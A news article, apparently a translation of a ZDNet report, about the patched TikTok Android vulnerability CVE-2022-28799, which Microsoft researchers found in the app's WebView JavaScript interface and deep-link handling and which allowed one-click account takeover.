Last February, Microsoft researchers discovered a security flaw in TikTok’s Android app. This could have allowed an attacker to hijack a user’s account after the user clicked on a link.
Fortunately, developers at ByteDance, TikTok’s parent company, quickly patched the vulnerability after being made aware of its existence. Microsoft researchers reported it last February through the bug bounty program, according to Dimitrios Valsamaras, a researcher with the Microsoft 365 Defender Research Team.
The security flaw is now named CVE-2022-28799. Now that a fix is available, Microsoft is urging all TikTok users on Android to update their app to the latest version.
Vulnerable all over the world
This is a nasty flaw in the app’s exposed JavaScript interface that could be exploited through a WebView component of the TikTok Android app, which has been downloaded 1.5 billion times from the Google Play Store. WebView is a component of Android that allows Android applications written in Java and Kotlin programming languages, compatible with Java, to display web content.
“Prior to version 23.7.3, the TikTok app for Android allows [à un attaquant] to take control of an account. (…) It could take advantage of an attached JavaScript interface for one-click takeover,” reads the CVE-2022-28799 file.
In a blog post, Dimitrios Valsamaras notes that there are two versions of the TikTok app on Android. One (with package name com.ss.android.ugc.trill) is for East and Southeast Asia and the other (with package name com.zhiliaoapp.musically) is intended for other regions. Both contain this vulnerability.
Update
“We commend the efficient and professional resolution of TikTok’s security team. TikTok users are encouraged to ensure they are using the latest version of the app,” writes Dimitrios Valsamaras.
The vulnerability stems from the way TikTok developers implemented the app’s JavaScript interfaces in WebView. The interface can provide “bridge functionality”, so that JavaScript code in a web page invokes specific Java methods of a particular class in the application.
“Loading untrusted web content into WebView with application-level objects accessed through JavaScript code makes the application vulnerable to JavaScript interface injection, which can lead to data leakage, corruption of data or, in some cases, an execution of arbitrary code,” explains the researcher.
Android specific
However, the real vulnerability lies in the way the TikTok app handles a particular “deep link” on Android, according to Dimitrios Valsamaras. Developers can use deep links to access a chosen component in an application. When users click a deep link, the Android package manager checks all installed apps to see which one can respond to the deep link, then routes it to the company declared to be its handler.
TikTok’s implementation of JavaScript interfaces in the app defined the impact of the vulnerability.
“In examining the app’s handling of a specific deep link, we discovered several issues that, when chained together, could have been used to force the app to load an arbitrary URL in the app’s WebView. writes the researcher.
“More than 70 methods exposed”
Microsoft found “more than 70 exposed methods” by checking features accessible to JavaScript code in web pages loaded in WebView. The combination of the vulnerability with the exposed methods may give attackers additional functionality to view and modify users’ private data.
By invoking these methods, the attacker can retrieve the user’s authentication tokens by triggering a request to a controlled server and saving the request cookie and headers. The attacker can also retrieve or modify data from the user’s TikTok account, such as private videos and profile settings.
“In short, by controlling one of the methods capable of making authenticated HTTP requests, a malicious actor could have compromised a TikTok user account,” warns the researcher.
Bad idea
Microsoft more generally believes that developers’ use of JavaScript interfaces is a bad idea and poses significant risks, as compromising this interface could potentially allow attackers to execute code using the user’s login and privileges. the app. Microsoft has previously detailed flaws caused by JavaScript interfaces in several popular Android apps.
Microsoft recommends that developers instead use an “approved list of trusted domains to load into the app’s WebView to prevent malicious or untrusted web content from being loaded.”
Google has also released a page for Android app developers to address JavaScript interface injection vulnerabilities.
Source: ZDNet.com